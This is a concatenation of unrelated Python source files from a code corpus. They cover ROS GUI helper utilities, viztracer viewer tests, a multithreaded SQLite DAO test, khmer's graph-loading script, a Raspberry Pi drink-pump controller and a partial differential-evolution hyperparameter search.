def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def enables_set(obj, k, en):
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_str_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
def send_to_proc_manager(order):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return -1
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
# EOF
|
test_viewer.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt
from .cmdline_tmpl import CmdlineTmpl
import json
import multiprocessing
import os
import signal
import socket
import subprocess
import sys
import time
import tempfile
import unittest.mock
import urllib.request
from viztracer.viewer import viewer_main
import webbrowser
class Viewer(unittest.TestCase):
def __init__(self, file_path, once=False):
if os.getenv("COVERAGE_RUN"):
self.cmd = ["coverage", "run", "-m", "--parallel-mode", "--pylib", "viztracer.viewer", "-s", file_path]
else:
self.cmd = ["vizviewer", "-s", file_path]
if once:
self.cmd.append("--once")
self.process = None
super().__init__()
def run(self):
self.process = subprocess.Popen(self.cmd)
self._wait_until_socket_on()
self.assertIs(self.process.poll(), None)
def stop(self):
self.process.send_signal(signal.SIGINT)
self.process.wait(timeout=20)
self.assertEqual(self.process.returncode, 0)
def _wait_until_socket_on(self):
for _ in range(10):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
result = sock.connect_ex(('127.0.0.1', 9001))
sock.close()
if result == 0:
return
time.sleep(1)
self.fail("Can't connect to 127.0.0.1:9001")
class MockOpen(unittest.TestCase):
def __init__(self, file_content):
self.p = None
self.file_content = file_content
super().__init__()
def get_and_check(self, url, expected):
time.sleep(0.5)
resp = urllib.request.urlopen(url)
self.assertEqual(resp.read().decode("utf-8"), expected)
def __call__(self, url):
self.p = multiprocessing.Process(target=self.get_and_check, args=(url, self.file_content))
self.p.start()
class TestViewer(CmdlineTmpl):
@unittest.skipIf(sys.platform == "win32", "Can't send Ctrl+C reliably on Windows")
def test_json(self):
json_script = '{"file_info": {}, "traceEvents": []}'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
f.write(json_script)
v = Viewer(f.name)
try:
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
resp = urllib.request.urlopen("http://127.0.0.1:9001/file_info")
self.assertEqual(json.loads(resp.read().decode("utf-8")), {})
resp = urllib.request.urlopen("http://127.0.0.1:9001/localtrace")
self.assertEqual(json.loads(resp.read().decode("utf-8")), json.loads(json_script))
finally:
v.stop()
finally:
os.remove(f.name)
@unittest.skipIf(sys.platform == "win32", "Can't send Ctrl+C reliably on Windows")
def test_html(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
v = Viewer(f.name)
try:
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
finally:
v.stop()
finally:
os.remove(f.name)
def test_once(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
v = Viewer(f.name, once=True)
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
v.process.wait(timeout=20)
self.assertTrue(resp.code == 200)
self.assertTrue(v.process.returncode == 0)
finally:
os.remove(f.name)
json_script = '{"file_info": {}, "traceEvents": []}'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
f.write(json_script)
v = Viewer(f.name, once=True)
v.run()
try:
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
resp = urllib.request.urlopen("http://127.0.0.1:9001/file_info")
self.assertEqual(json.loads(resp.read().decode("utf-8")), {})
resp = urllib.request.urlopen("http://127.0.0.1:9001/localtrace")
self.assertEqual(json.loads(resp.read().decode("utf-8")), json.loads(json_script))
except Exception:
v.stop()
raise
finally:
v.process.wait(timeout=20)
finally:
os.remove(f.name)
@unittest.skipIf(sys.platform == "darwin", "MacOS has a high security check for multiprocessing")
def test_browser(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
with unittest.mock.patch.object(sys, "argv", ["vizviewer", "--once", f.name]):
with unittest.mock.patch.object(webbrowser, "open_new_tab", MockOpen(html)) as mock_obj:
viewer_main()
mock_obj.p.join()
self.assertEqual(mock_obj.p.exitcode, 0)
finally:
os.remove(f.name)
def test_invalid(self):
self.template(["vizviewer", "do_not_exist.json"], success=False, expected_output_file=None)
self.template(["vizviewer", "README.md"], success=False, expected_output_file=None)
|
main.py
|
# -*- coding: utf-8 -*-
""" Test code to test multithread handling of DAO class
The aim is to provide a DAO coherent with multithread access
"""
import threading
from dao import DaoTestWrapper, DummyLogger, shutting_down, DaoTest
logger = DummyLogger()
TEST_OLD_CLASS = False # switch to True to test old class' action
THREAD_COUNT_3 = 9 # controls the number of threads started (given num * 3)
if not TEST_OLD_CLASS:
dtw = DaoTestWrapper() # common instance should be stored somewhere
else:
dtw = DaoTest() # old class
def select(id_):
res = dtw.select_sql("SELECT * FROM pytest WHERE id="+str(id_))
logger.info("【MAIN】Result:" + str(res))
if res is False: # presumably an SQLite Error
logger.info("\n!!!!! CHECK ABOVE FOR SQLITE ERROR !!! (Thread id: "+str(threading.current_thread().ident)+")\n")
return res
def select_1():
ret = select(1)
if ret != [{'id': 1, 'name': 'Name-A'}]:
logger.info("(ERROR: expected [{'id': 1, 'name': 'Name-A'}] got "+str(ret)+")\n\n")
def select_2():
ret = select(2)
if ret != [{'id': 2, 'name': 'Name-B'}]:
logger.info("(ERROR: expected [{'id': 2, 'name': 'Name-B'}] got "+str(ret)+")\n\n")
def select_3():
ret = select(3)
if ret != [{'id': 3, 'name': 'Name-C'}]:
logger.info("(ERROR: expected [{'id': 3, 'name': 'Name-C'}] got "+str(ret)+")\n\n")
# ### main process start ###
DummyLogger.log = False
dtw.start()
dtw.initialize()
dtw.execute("DROP TABLE IF EXISTS pytest")
dtw.execute("create table pytest (id INTEGER PRIMARY KEY NOT NULL, name VARCHAR(64))")
dtw.execute("insert into pytest (id, name) values (1,\"Name-A\")")
dtw.execute("insert into pytest (id, name) values (2,\"Name-B\")")
dtw.execute("insert into pytest (id, name) values (3,\"Name-C\")")
DummyLogger.log = True
# SELECT from main thread
logger.info("【MAIN】Calling SELECT from main thread:")
select(1)
# SELECT from sub threads
thr_list = []
for i in range(1, THREAD_COUNT_3):
thr_list.append(threading.Thread(target=select_1))
thr_list.append(threading.Thread(target=select_2))
thr_list.append(threading.Thread(target=select_3))
logger.info("【MAIN】Calling SELECT from sub threads:")
for thr in thr_list:
thr.start()
for thr in thr_list:
thr.join()
# shutdown
shutting_down.set()
|
load-graph.py
|
#!/usr/bin/python2.7
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2014. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# pylint: disable=invalid-name,missing-docstring
"""
Build a graph from the given sequences, save in <htname>.
% python scripts/load-graph.py <htname> <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
import sys
import threading
import khmer
from khmer.khmer_args import build_hashbits_args
from khmer.khmer_args import (report_on_config, info)
from khmer.threading_args import add_threading_args
from khmer.file import check_file_status, check_space
from khmer.file import check_space_for_hashtable
def get_parser():
parser = build_hashbits_args(descr="Load sequences into the compressible "
"graph format plus optional tagset.")
add_threading_args(parser)
parser.add_argument('--no-build-tagset', '-n', default=False,
action='store_true', dest='no_build_tagset',
help='Do NOT construct tagset while loading sequences')
parser.add_argument('output_filename',
metavar='output_presence_table_filename', help='output'
' k-mer presence table filename.')
parser.add_argument('input_filenames', metavar='input_sequence_filename',
nargs='+', help='input FAST[AQ] sequence filename')
parser.add_argument('--report-total-kmers', '-t', action='store_true',
help="Prints the total number of k-mers to stderr")
return parser
def main():
info('load-graph.py', ['graph'])
args = get_parser().parse_args()
report_on_config(args, hashtype='hashbits')
base = args.output_filename
filenames = args.input_filenames
n_threads = int(args.n_threads)
for _ in args.input_filenames:
check_file_status(_)
check_space(args.input_filenames)
check_space_for_hashtable(float(args.n_tables * args.min_tablesize) / 8.)
print 'Saving k-mer presence table to %s' % base
print 'Loading kmers from sequences in %s' % repr(filenames)
if args.no_build_tagset:
print 'We WILL NOT build the tagset.'
else:
print 'We WILL build the tagset (for partitioning/traversal).'
print 'making k-mer presence table'
htable = khmer.new_hashbits(args.ksize, args.min_tablesize, args.n_tables)
if args.no_build_tagset:
target_method = htable.consume_fasta_with_reads_parser
else:
target_method = htable.consume_fasta_and_tag_with_reads_parser
config = khmer.get_config()
config.set_reads_input_buffer_size(n_threads * 64 * 1024)
for _, filename in enumerate(filenames):
rparser = khmer.ReadParser(filename, n_threads)
threads = []
print 'consuming input', filename
for _ in xrange(n_threads):
cur_thrd = threading.Thread(target=target_method, args=(rparser, ))
threads.append(cur_thrd)
cur_thrd.start()
for thread in threads:
thread.join()
if args.report_total_kmers:
print >> sys.stderr, 'Total number of k-mers: {0}'.format(
htable.n_occupied())
print 'saving k-mer presence table in', base + '.pt'
htable.save(base + '.pt')
if not args.no_build_tagset:
print 'saving tagset in', base + '.tagset'
htable.save_tagset(base + '.tagset')
info_fp = open(base + '.info', 'w')
info_fp.write('%d unique k-mers' % htable.n_unique_kmers())
fp_rate = khmer.calc_expected_collisions(htable)
print 'fp rate estimated to be %1.3f' % fp_rate
if fp_rate > 0.15: # 0.18 is ACTUAL MAX. Do not change.
print >> sys.stderr, "**"
print >> sys.stderr, ("** ERROR: the graph structure is too small for "
"this data set. Increase table size/# tables.")
print >> sys.stderr, "**"
sys.exit(1)
if __name__ == '__main__':
main()
# vim: set ft=python ts=4 sts=4 sw=4 et tw=79:
|
bartender.py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
import time
import sys
import RPi.GPIO as GPIO
import json
import traceback
import threading
import textwrap
import subprocess
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 200
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 200
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/500.0
# Raspberry Pi pin configuration:
RST = 14
# Note the following are only used with SPI:
DC = 15
SPI_PORT = 0
SPI_DEVICE = 0
#Fontsize and Font Type Settings
FONTSIZE = 15
FONTFILE = "InputSans-Regular.ttf"
#Wraps Text for better view on OLED screen. 13 is best for 128x64
WRAPPER = textwrap.TextWrapper(width=13)
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
# configure interrups for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
spi_bus = 0
spi_device = 0
#Load the display driver. Attention: 128_64 is the display size. Needed to be changed if different in your setup
self.led = disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST, dc=DC, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE, max_speed_hz=8000000)) # Change rows & cols values depending on your display dimensions.
# Initialize library.
self.led.begin()
# Clear display.
self.led.clear()
self.led.display()
# Create image buffer.
# Make sure to create image with mode '1' for 1-bit color.
self.image = Image.new('1', (self.screen_width, self.screen_height))
# Load default font.
#self.font = ImageFont.load_default()
self.font = ImageFont.truetype(FONTFILE, FONTSIZE)
# Create drawing object.
self.draw = ImageDraw.Draw(self.image)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
#Auskommentiert solange noch kein LED Strip angebracht.
#self.strip.begin() # Initialize pins for output
self.strip.setBrightness(NEOPIXEL_BRIGHTNESS) # Limit brightness to ~1/4 duty cycle
# turn everything off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
print "Done initializing"
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
# adds an option that shuts down the rpi
configuration_menu.addOption(MenuItem('shutdown', 'Shutdown'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
elif(menuItem.type == "shutdown"):
self.shutdown()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
def shutdown(self):
shutdowntext = "Shutdown takes 10 seconds. Bye!"
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
words_list = WRAPPER.wrap(text=shutdowntext)
TextNew = ''
for ii in words_list[:-1]:
TextNew = TextNew + ii + "\n"
TextNew += words_list[-1]
self.draw.text((0,10),str(TextNew), font=self.font, fill=255)
self.led.image(self.image)
self.led.display()
time.sleep(5);
#Clean shutdown device
subprocess.Popen(['shutdown','-h','now'])
def displayMenuItem(self, menuItem):
print menuItem.name
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
words_list = WRAPPER.wrap(text=menuItem.name)
MenuItemNew = ''
for ii in words_list[:-1]:
MenuItemNew = MenuItemNew + ii + "\n"
MenuItemNew += words_list[-1]
self.draw.text((0,10),str(MenuItemNew), font=self.font, fill=255)
self.led.image(self.image)
self.led.display()
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
for x in range(1, 101):
self.led.clear()
self.draw.rectangle((0,0,self.screen_width,self.screen_height), outline=0, fill=0)
self.updateProgressBar(x, y=35)
self.led.image(self.image)
self.led.display()
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
lightsThread = threading.Thread(target=self.cycleLights)
lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
lightsThread.do_run = False
lightsThread.join()
# show the ending sequence lights
self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
print("LEFT_BTN pressed")
if not self.running:
self.running = True
self.menuContext.advance()
print("Finished processing button press")
self.running = False
def right_btn(self, ctx):
print("RIGHT_BTN pressed")
if not self.running:
self.running = True
self.menuContext.select()
print("Finished processing button press")
self.running = 2
print("Starting button timeout")
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.draw.point((w + x, y), fill=255)
self.draw.point((w + x, y + height), fill=255)
for h in range(0, height):
self.draw.point((x, h + y), fill=255)
self.draw.point((self.screen_width-x, h + y), fill=255)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.draw.point((x + p_loc, h + y), fill=255)
def run(self):
self.startInterrupts()
# main loop
try:
try:
while True:
letter = raw_input(">")
if letter == "l":
self.left_btn(False)
if letter == "r":
self.right_btn(False)
except EOFError:
while True:
time.sleep(0.1)
if self.running not in (True,False):
self.running -= 0.1
if self.running == 0:
self.running = False
print("Finished button timeout")
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
differential_evolution.py
|
"""
Differential evolution implementation
"""
import random
from collections import OrderedDict
import os
from hops import hdfs, tensorboard, devices, util
from hops.experiment_impl.util import experiment_utils
from hops.experiment import Direction
import threading
import six
import time
import copy
import json
import sys
objective_function=None
spark=None
opt_key=None
diff_evo=None
cleanup=None
fs_handle=None
local_logdir_bool=False
generation_id = 0
run_id = 0
def _get_all_accuracies(tensorboard_hdfs_logdir, args_dict, number_params):
"""
Retrieves all accuracies from the parallel executions (each one is in a
different file, one per combination of wrapper function parameter)
Args:
:tensorboard_hdfs_logdir:
:args_dict:
:number_params:
Returns:
"""
results=[]
#Important, this must be ordered equally than _parse_to_dict function
population_dict = diff_evo.get_dict()
global run_id
for i in range(number_params):
path_to_log= tensorboard_hdfs_logdir + "/generation." + str(generation_id - 1) + "/"
for k in population_dict:
path_to_log+=k+'='+str(args_dict[k][i])+ '&'
path_to_log = path_to_log[:(len(path_to_log) -1)]
path_to_log = path_to_log + '/.metric'
with hdfs.open_file(path_to_log, flags="r") as fi:
metric = fi.read()
fi.close()
results.append(metric)
return [float(res) for res in results]
def _execute_all(population_dict, name="no-name"):
"""
Executes wrapper function with all values of population_dict parallely.
Returns a list of accuracies (or metric returned in the wrapper) in the
same order as in the population_dict.
Args:
:population_dict:
:name:
Returns:
"""
initial_pop = copy.deepcopy(population_dict)
number_hp_combinations=[len(v) for v in population_dict.values()][0]
# directory for current generation
# Do not run hyperparameter combinations that are duplicated
# Find all duplicates and delete them
keys = population_dict.keys()
i=0
while i < number_hp_combinations:
duplicate_entries = _duplicate_entry(i, keys, population_dict, number_hp_combinations)
if len(duplicate_entries) > 0:
# sort entries, delete descending
for index in duplicate_entries:
for key in keys:
population_dict[key].pop(index)
i=0
number_hp_combinations = [len(v) for v in population_dict.values()][0]
else:
i+=1
tensorboard_hdfs_logdir = _evolutionary_launch(spark, objective_function, population_dict, name=name)
return _get_all_accuracies(tensorboard_hdfs_logdir, initial_pop, [len(v) for v in initial_pop.values()][0])
def _duplicate_entry(i, keys, population, len):
"""
Args:
:i:
:keys:
:population:
:len:
Returns:
"""
hp_combinations = []
duplicate_indices = []
for val in range(len):
entry=''
for key in keys:
entry += str(population[key][val]) + '='
hp_combinations.append(entry)
to_find = hp_combinations[i]
#get the duplicate indices
for y in range(len):
if hp_combinations[y] == to_find and y != i:
duplicate_indices.insert(0, y)
return duplicate_indices
class DifferentialEvolution:
_types = ['float', 'int', 'cat']
_generation = 0
_scores = []
_ordered_population_dict = []
_param_names = []
def __init__(self, objective_function, parbounds, types, ordered_dict, direction=Direction.MAX, generations=10, population=10, mutation=0.5, crossover=0.7, name="no-name"):
"""
Args:
:objective_function:
:parbounds:
:types:
:ordered_dict:
:direction:
:generations:
:population:
:mutation:
:crossover:
:name:
"""
self.objective_function = objective_function
self.parbounds = parbounds
self.direction = direction
self.types = types
self.generations = generations
self.n = population
self.F = mutation
self.CR = crossover
self._ordered_population_dict = ordered_dict
self.name = name
global generation_id
generation_id = 0
self._param_names = []
for entry in ordered_dict:
self._param_names.append(entry)
#self.m = -1 if maximize else 1
# run differential evolution algorithms
def _solve(self, root_dir):
"""
Args:
:root_dir:
Returns:
"""
# initialise generation based on individual representation
population, bounds = self._population_initialisation()
global fs_handle
fs_handle = hdfs.get_fs()
global run_id
new_gen_best_param = None
new_gen_best = None
for _ in range(self.generations):
donor_population = self._mutation(population, bounds)
trial_population = self._recombination(population, donor_population)
population = self._selection(population, trial_population)
new_gen_avg = sum(self._scores)/self.n
if self.direction.upper() == Direction.MAX:
new_gen_best = max(self._scores)
elif self.direction.upper() == Direction.MIN:
new_gen_best = min(self._scores)
else:
raise ValueError('invalid direction: ' + self.direction)
new_gen_best_param = self._parse_back(population[self._scores.index(new_gen_best)])
index = 0
for name in self._param_names:
new_gen_best_param[index] = name + "=" + str(new_gen_best_param[index])
index += 1
print("Generation " + str(self._generation) + " || " + "average metric: " + str(new_gen_avg) \
+ ", best metric: " + str(new_gen_best) + ", best parameter combination: " + str(new_gen_best_param) + "\n")
if cleanup:
hdfs.rmr(root_dir + '/generation.' + str(self._generation-1))
parsed_back_population = []
for indiv in population:
parsed_back_population.append(self._parse_back(indiv))
return new_gen_best_param, new_gen_best
# define bounds of each individual depending on type
def _individual_representation(self):
"""
Returns:
"""
bounds = []
for index, item in enumerate(self.types):
b =()
# if categorical then take bounds from 0 to number of items
if item == self._types[2]:
b = (0, int(len(self.parbounds[index]) - 1))
# if float/int then take given bounds
else:
b = self.parbounds[index]
bounds.append(b)
return bounds
# initialise population
def _population_initialisation(self):
"""
Returns:
"""
population = []
num_parameters = len(self.parbounds)
for i in range(self.n):
indiv = []
bounds = self._individual_representation()
for i in range(num_parameters):
indiv.append(random.uniform(bounds[i][0], bounds[i][1]))
indiv = self._ensure_bounds(indiv, bounds)
population.append(indiv)
return population, bounds
# ensure that any mutated individual is within bounds
def _ensure_bounds(self, indiv, bounds):
"""
Args:
:indiv:
:bounds:
Returns:
"""
indiv_correct = []
for i in range(len(indiv)):
par = indiv[i]
# check if param is within bounds
lowerbound = bounds[i][0]
upperbound = bounds[i][1]
if par < lowerbound:
par = lowerbound
elif par > upperbound:
par = upperbound
